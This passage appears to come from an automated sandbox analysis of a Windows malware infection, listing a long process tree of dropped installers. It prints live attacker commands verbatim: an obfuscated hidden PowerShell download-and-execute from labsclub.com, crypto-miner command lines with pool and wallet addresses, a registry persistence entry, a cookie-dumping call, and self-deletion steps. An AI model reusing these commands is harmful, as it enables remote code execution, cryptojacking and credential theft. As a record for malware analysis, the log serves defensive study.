        "C:\Users\Admin\AppData\Local\Temp\is-HRQPU.tmp\vpn.tmp" /SL5="$702AE,15170975,270336,C:\Users\Admin\AppData\Local\Temp\sp2acmbodpn\vpn.exe" /silent /subid=482
        16⤵
        
        PID:15716
        
        C:\Users\Admin\AppData\Local\Temp\0CJY5Q11NH\setups.exe
        
        "C:\Users\Admin\AppData\Local\Temp\0CJY5Q11NH\setups.exe" ll
        12⤵
        
        PID:4048
        
        C:\Users\Admin\AppData\Local\Temp\is-661EJ.tmp\setups.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-661EJ.tmp\setups.tmp" /SL5="$402C4,635399,250368,C:\Users\Admin\AppData\Local\Temp\0CJY5Q11NH\setups.exe" ll
        13⤵
        
        PID:5636
        
        C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\2oG1o0Zhe2Ng.exe
        
        "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\2oG1o0Zhe2Ng.exe"
        11⤵
        
        PID:5352
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        12⤵
        
        PID:4684
        
        C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe
        
        "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"
        11⤵
        
        PID:5188
        
        C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exe
        
        "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exe"
        11⤵
        
        PID:4824
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4824 -s 948
        12⤵
        Program crash
        
        PID:15060
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4824 -s 928
        12⤵
        Program crash
        
        PID:15240
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4824 -s 1084
        12⤵
        Program crash
        
        PID:16048
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4824 -s 1116
        12⤵
        Program crash
        
        PID:5132
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4824 -s 1180
        12⤵
        Program crash
        
        PID:16060
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4824 -s 1240
        12⤵
        Program crash
        
        PID:16404
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4824 -s 1512
        12⤵
        Program crash
        
        PID:15864
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4824 -s 1540
        12⤵
        Program crash
        
        PID:6292
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4824 -s 1768
        12⤵
        Program crash
        
        PID:6808
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4824 -s 1748
        12⤵
        Program crash
        
        PID:6956
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4824 -s 1724
        12⤵
        Program crash
        
        PID:7020
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4824 -s 1660
        12⤵
        Program crash
        
        PID:6208
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4824 -s 1788
        12⤵
        Program crash
        
        PID:7476
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4824 -s 1780
        12⤵
        Program crash
        
        PID:7836
        
        C:\Users\Admin\AppData\Local\Temp\hb3xcyiwx0b\23znuxynwjg.exe
        
        "C:\Users\Admin\AppData\Local\Temp\hb3xcyiwx0b\23znuxynwjg.exe" /ustwo INSTALL
        8⤵
        
        PID:4568
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "23znuxynwjg.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\hb3xcyiwx0b\23znuxynwjg.exe" & exit
        9⤵
        
        PID:5268
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "23znuxynwjg.exe" /f
        10⤵
        Kills process with taskkill
        
        PID:4536
        
        C:\Users\Admin\AppData\Local\Temp\xbxkju2l1vv\vict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\xbxkju2l1vv\vict.exe" /VERYSILENT /id=535
        8⤵
        
        PID:4748
        
        C:\Users\Admin\AppData\Local\Temp\is-9ULJM.tmp\vict.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-9ULJM.tmp\vict.tmp" /SL5="$2029A,870426,780800,C:\Users\Admin\AppData\Local\Temp\xbxkju2l1vv\vict.exe" /VERYSILENT /id=535
        9⤵
        
        PID:4124
        
        C:\Users\Admin\AppData\Local\Temp\is-LQ95M.tmp\win1host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-LQ95M.tmp\win1host.exe" 535
        10⤵
        
        PID:5024
        
        C:\Users\Admin\AppData\Local\Temp\N19jgRC6U.exe
        
        "C:\Users\Admin\AppData\Local\Temp\N19jgRC6U.exe"
        11⤵
        
        PID:16124
        
        C:\Users\Admin\AppData\Local\Temp\N19jgRC6U.exe
        
        "C:\Users\Admin\AppData\Local\Temp\N19jgRC6U.exe"
        12⤵
        
        PID:15696
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5024 -s 1548
        11⤵
        Program crash
        
        PID:9156
        
        C:\Users\Admin\AppData\Local\Temp\pkywzojxbv2\IBInstaller_97039.exe
        
        "C:\Users\Admin\AppData\Local\Temp\pkywzojxbv2\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
        8⤵
        
        PID:1360
        
        C:\Users\Admin\AppData\Local\Temp\is-4VTEN.tmp\IBInstaller_97039.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-4VTEN.tmp\IBInstaller_97039.tmp" /SL5="$20208,14574851,721408,C:\Users\Admin\AppData\Local\Temp\pkywzojxbv2\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
        9⤵
        
        PID:4292
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-DTNS0.tmp\{app}\microsoft.cab -F:* %ProgramData%
        10⤵
        
        PID:4428
        
        C:\Windows\SysWOW64\expand.exe
        
        expand C:\Users\Admin\AppData\Local\Temp\is-DTNS0.tmp\{app}\microsoft.cab -F:* C:\ProgramData
        11⤵
        
        PID:4712
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c start http://egypthistoricart.online/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=97039^&param=
        10⤵
        
        PID:13604
        
        C:\ProgramData\regid.1993-06.com.microsoft\client32.exe
        
        "C:\ProgramData\regid.1993-06.com.microsoft\client32.exe"
        10⤵
        
        PID:13748
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\client32.exe" /f
        10⤵
        
        PID:16068
        
        C:\Users\Admin\AppData\Local\Temp\ka2scjeet0z\vpn.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ka2scjeet0z\vpn.exe" /silent /subid=482
        8⤵
        
        PID:1404
        
        C:\Users\Admin\AppData\Local\Temp\is-J7I69.tmp\vpn.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-J7I69.tmp\vpn.tmp" /SL5="$201F2,15170975,270336,C:\Users\Admin\AppData\Local\Temp\ka2scjeet0z\vpn.exe" /silent /subid=482
        9⤵
        
        PID:4276
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
        10⤵
        
        PID:4776
        
        C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
        
        tapinstall.exe remove tap0901
        11⤵
        
        PID:4244
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
        10⤵
        
        PID:4328
        
        C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
        
        tapinstall.exe install OemVista.inf tap0901
        11⤵
        
        PID:8072
        
        C:\Program Files (x86)\MaskVPN\mask_svc.exe
        
        "C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
        10⤵
        
        PID:12136
        
        C:\Program Files (x86)\MaskVPN\mask_svc.exe
        
        "C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
        10⤵
        
        PID:13552
        
        C:\Users\Admin\AppData\Local\Temp\gzv231og5uy\app.exe
        
        "C:\Users\Admin\AppData\Local\Temp\gzv231og5uy\app.exe" /8-23
        8⤵
        
        PID:4172
        
        C:\Users\Admin\AppData\Local\Temp\gzv231og5uy\app.exe
        
        "C:\Users\Admin\AppData\Local\Temp\gzv231og5uy\app.exe" /8-23
        9⤵
        
        PID:14756
        
        C:\Users\Admin\AppData\Local\Temp\mscgstwtsvp\njydr2whk0d.exe
        
        "C:\Users\Admin\AppData\Local\Temp\mscgstwtsvp\njydr2whk0d.exe" /quiet SILENT=1 AF=756
        8⤵
        
        PID:3632
        
        C:\Windows\SysWOW64\msiexec.exe
        
        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=756 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\mscgstwtsvp\njydr2whk0d.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\mscgstwtsvp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1617176556 /quiet SILENT=1 AF=756 " AF="756" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912"
        9⤵
        
        PID:4460
        
        C:\Users\Admin\AppData\Local\Temp\oxx5axx3h3c\o1cqfif1hna.exe
        
        "C:\Users\Admin\AppData\Local\Temp\oxx5axx3h3c\o1cqfif1hna.exe"
        8⤵
        
        PID:4364
    - - C:\Users\Admin\AppData\Local\Temp\OH6V3WD3XE\setups.exe
        
        "C:\Users\Admin\AppData\Local\Temp\OH6V3WD3XE\setups.exe" ll
        5⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:3180
      - C:\Users\Admin\AppData\Local\Temp\is-INNI1.tmp\setups.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-INNI1.tmp\setups.tmp" /SL5="$701BA,635399,250368,C:\Users\Admin\AppData\Local\Temp\OH6V3WD3XE\setups.exe" ll
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:2976
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:3776
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        5⤵
        
        PID:5016
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        6⤵
        Kills process with taskkill
        
        PID:5060
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\Full Program Features.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX1\Full Program Features.exe"
      4⤵
      PID:4464
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"
      4⤵
      PID:5052
    - - C:\Users\Admin\AppData\Roaming\297.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\297.tmp.exe"
        5⤵
        
        PID:5996
      - C:\Users\Admin\AppData\Roaming\297.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\297.tmp.exe"
        6⤵
        
        PID:5568
    - - C:\Users\Admin\AppData\Roaming\586.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\586.tmp.exe"
        5⤵
        
        PID:6080
      - C:\Windows\system32\msiexec.exe
        
        -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
        6⤵
        
        PID:5844
      - C:\Windows\system32\msiexec.exe
        
        -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 9999
        6⤵
        
        PID:6452
    - - C:\Users\Admin\AppData\Roaming\681.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\681.tmp.exe"
        5⤵
        
        PID:2428
      - C:\Windows\SysWOW64\cmd.exe
        
        /c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Roaming\681.tmp.exe
        6⤵
        
        PID:6224
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 3
        7⤵
        Delays execution with timeout.exe
        
        PID:6792
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"
        5⤵
        
        PID:5472
      - C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1
        6⤵
        Runs ping.exe
        
        PID:4984
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe"
      4⤵
      PID:5980
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\BTRSetp.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX1\BTRSetp.exe"
      4⤵
      PID:10492
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\gcttt.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX1\gcttt.exe"
      4⤵
      PID:13044
    - - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        5⤵
        
        PID:13460
    - - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        5⤵
        
        PID:14788

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:1296

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:3976

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:4228

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:4296

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"
1⤵
PID:5084
- C:\Windows\SysWOW64\rundll32.exe
  "C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install
  2⤵
  PID:4104

C:\Users\Admin\AppData\Local\Temp\is-P3T0S.tmp\winlthsth.exe
"C:\Users\Admin\AppData\Local\Temp\is-P3T0S.tmp\winlthsth.exe"
1⤵
PID:4732
- C:\Users\Admin\AppData\Local\Temp\9WMQxU8xY.exe
  "C:\Users\Admin\AppData\Local\Temp\9WMQxU8xY.exe"
  2⤵
  PID:15960
- - C:\Users\Admin\AppData\Local\Temp\9WMQxU8xY.exe
    "C:\Users\Admin\AppData\Local\Temp\9WMQxU8xY.exe"
    3⤵
    PID:16220
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
  2⤵
  PID:8944
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
    3⤵
    PID:9388

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SystemNetworkService
1⤵
PID:4996

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\oxx5axx3h3c\o1cqfif1hna.exe"
1⤵
PID:5076
- C:\Windows\SysWOW64\PING.EXE
  ping 1.1.1.1 -n 1 -w 3000
  2⤵
  - Runs ping.exe
  PID:4360

C:\Users\Admin\AppData\Local\Temp\is-67FKD.tmp\lylal220.tmp
"C:\Users\Admin\AppData\Local\Temp\is-67FKD.tmp\lylal220.tmp" /SL5="$30374,491750,408064,C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"
1⤵
PID:5344
- C:\Users\Admin\AppData\Local\Temp\is-7PCD4.tmp\Microsoft.exe
  "C:\Users\Admin\AppData\Local\Temp\is-7PCD4.tmp\Microsoft.exe" /S /UID=lylal220
  2⤵
  PID:5700
- - C:\Program Files\javcse\ZGQXJJRAXI\irecord.exe
    "C:\Program Files\javcse\ZGQXJJRAXI\irecord.exe" /VERYSILENT
    3⤵
    PID:4108
  - - C:\Users\Admin\AppData\Local\Temp\is-T0PLK.tmp\irecord.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-T0PLK.tmp\irecord.tmp" /SL5="$302D6,6265333,408064,C:\Program Files\javcse\ZGQXJJRAXI\irecord.exe" /VERYSILENT
      4⤵
      PID:4516
- - C:\Users\Admin\AppData\Local\Temp\81-db2a8-518-11e8c-f75a3599cd18a\Pemaelewevy.exe
    "C:\Users\Admin\AppData\Local\Temp\81-db2a8-518-11e8c-f75a3599cd18a\Pemaelewevy.exe"
    3⤵
    PID:5128
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3r24k30t.vhw\md6_6ydj.exe & exit
      4⤵
      PID:16108
    - - C:\Users\Admin\AppData\Local\Temp\3r24k30t.vhw\md6_6ydj.exe
        
        C:\Users\Admin\AppData\Local\Temp\3r24k30t.vhw\md6_6ydj.exe
        5⤵
        
        PID:16756
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zvnlgztf.2e3\askinstall31.exe & exit
      4⤵
      PID:15692
    - - C:\Users\Admin\AppData\Local\Temp\zvnlgztf.2e3\askinstall31.exe
        
        C:\Users\Admin\AppData\Local\Temp\zvnlgztf.2e3\askinstall31.exe
        5⤵
        
        PID:16692
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        6⤵
        
        PID:17372
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        7⤵
        Kills process with taskkill
        
        PID:16988
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0zlqcqn4.dx3\toolspab1.exe & exit
      4⤵
      PID:15596
    - - C:\Users\Admin\AppData\Local\Temp\0zlqcqn4.dx3\toolspab1.exe
        
        C:\Users\Admin\AppData\Local\Temp\0zlqcqn4.dx3\toolspab1.exe
        5⤵
        
        PID:16800
      - C:\Users\Admin\AppData\Local\Temp\0zlqcqn4.dx3\toolspab1.exe
        
        C:\Users\Admin\AppData\Local\Temp\0zlqcqn4.dx3\toolspab1.exe
        6⤵
        
        PID:17268
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tqfzdh5d.2cw\setup_10.2_mix.exe & exit
      4⤵
      PID:17128
    - - C:\Users\Admin\AppData\Local\Temp\tqfzdh5d.2cw\setup_10.2_mix.exe
        
        C:\Users\Admin\AppData\Local\Temp\tqfzdh5d.2cw\setup_10.2_mix.exe
        5⤵
        
        PID:16972
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jfmqoh5i.jm2\GcleanerWW.exe /mixone & exit
      4⤵
      PID:11632
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wdfiq2md.cvp\app.exe /8-2222 & exit
      4⤵
      PID:936
    - - C:\Users\Admin\AppData\Local\Temp\wdfiq2md.cvp\app.exe
        
        C:\Users\Admin\AppData\Local\Temp\wdfiq2md.cvp\app.exe /8-2222
        5⤵
        
        PID:6828
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\blsz3brm.o5n\file.exe & exit
      4⤵
      PID:7036
    - - C:\Users\Admin\AppData\Local\Temp\blsz3brm.o5n\file.exe
        
        C:\Users\Admin\AppData\Local\Temp\blsz3brm.o5n\file.exe
        5⤵
        
        PID:7296
      - C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"
        6⤵
        
        PID:6248
        
        C:\Users\Admin\AppData\Local\Temp\SMEPKTHK7M\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SMEPKTHK7M\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
        7⤵
        
        PID:8264
        
        C:\Users\Admin\AppData\Local\Temp\SMEPKTHK7M\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SMEPKTHK7M\multitimer.exe" 1 3.1617436412.60681efc7244a 101
        8⤵
        
        PID:5988
        
        C:\Users\Admin\AppData\Local\Temp\SMEPKTHK7M\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SMEPKTHK7M\multitimer.exe" 2 3.1617436412.60681efc7244a
        9⤵
        
        PID:10860
        
        C:\Users\Admin\AppData\Local\Temp\hfaycaxslnj\izkrljo2pqf.exe
        
        "C:\Users\Admin\AppData\Local\Temp\hfaycaxslnj\izkrljo2pqf.exe" /ustwo INSTALL
        10⤵
        
        PID:14432
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "izkrljo2pqf.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\hfaycaxslnj\izkrljo2pqf.exe" & exit
        11⤵
        
        PID:5672
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "izkrljo2pqf.exe" /f
        12⤵
        Kills process with taskkill
        
        PID:8988
        
        C:\Users\Admin\AppData\Local\Temp\kacr1gwjw24\cpyrix.exe
        
        "C:\Users\Admin\AppData\Local\Temp\kacr1gwjw24\cpyrix.exe" /VERYSILENT
        10⤵
        
        PID:14164
        
        C:\Users\Admin\AppData\Roaming\1.exe
        
        C:\Users\Admin\AppData\Roaming\1.exe
        11⤵
        
        PID:7264
        
        C:\Windows\SysWOW64\at.exe
        
        "C:\Windows\System32\at.exe"
        12⤵
        
        PID:9880
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Tre.pub
        12⤵
        
        PID:10984
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\System32\cmd.exe
        13⤵
        
        PID:10640
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        C:\Users\Admin\AppData\Roaming\2.exe
        11⤵
        
        PID:8572
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        "{path}"
        12⤵
        
        PID:17076
        
        C:\Users\Admin\AppData\Local\Temp\d2gspbpimer\Setup3310.exe
        
        "C:\Users\Admin\AppData\Local\Temp\d2gspbpimer\Setup3310.exe" /Verysilent /subid=577
        10⤵
        
        PID:14568
        
        C:\Users\Admin\AppData\Local\Temp\is-J5VVF.tmp\Setup3310.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-J5VVF.tmp\Setup3310.tmp" /SL5="$30656,138429,56832,C:\Users\Admin\AppData\Local\Temp\d2gspbpimer\Setup3310.exe" /Verysilent /subid=577
        11⤵
        
        PID:14840
        
        C:\Users\Admin\AppData\Local\Temp\is-7FELS.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-7FELS.tmp\Setup.exe" /Verysilent
        12⤵
        
        PID:9648
        
        C:\Users\Admin\AppData\Local\Temp\3sfbhc1n11m\app.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3sfbhc1n11m\app.exe" /8-23
        10⤵
        
        PID:14264
        
        C:\Users\Admin\AppData\Local\Temp\0kmuv3jtja5\vict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\0kmuv3jtja5\vict.exe" /VERYSILENT /id=535
        10⤵
        
        PID:13864
        
        C:\Users\Admin\AppData\Local\Temp\is-LSEEA.tmp\vict.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-LSEEA.tmp\vict.tmp" /SL5="$30734,870426,780800,C:\Users\Admin\AppData\Local\Temp\0kmuv3jtja5\vict.exe" /VERYSILENT /id=535
        11⤵
        
        PID:17108
        
        C:\Users\Admin\AppData\Local\Temp\is-NNCLF.tmp\win1host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-NNCLF.tmp\win1host.exe" 535
        12⤵
        
        PID:8464
        
        C:\Users\Admin\AppData\Local\Temp\21AQM1KFZV\setups.exe
        
        "C:\Users\Admin\AppData\Local\Temp\21AQM1KFZV\setups.exe" ll
        7⤵
        
        PID:8516
        
        C:\Users\Admin\AppData\Local\Temp\is-CM7ES.tmp\setups.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-CM7ES.tmp\setups.tmp" /SL5="$70324,635399,250368,C:\Users\Admin\AppData\Local\Temp\21AQM1KFZV\setups.exe" ll
        8⤵
        
        PID:8652
      - C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"
        6⤵
        
        PID:8592
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        7⤵
        
        PID:8524
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        8⤵
        Kills process with taskkill
        
        PID:9368
      - C:\Users\Admin\AppData\Local\Temp\RarSFX2\Full Program Features.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Full Program Features.exe"
        6⤵
        
        PID:10588
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"
        7⤵
        
        PID:11192
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install
        8⤵
        
        PID:11396
      - C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"
        6⤵
        
        PID:15732
        
        C:\Users\Admin\AppData\Roaming\F4CE.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\F4CE.tmp.exe"
        7⤵
        
        PID:11628
        
        C:\Windows\system32\msiexec.exe
        
        -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
        8⤵
        
        PID:13204
        
        C:\Windows\system32\msiexec.exe
        
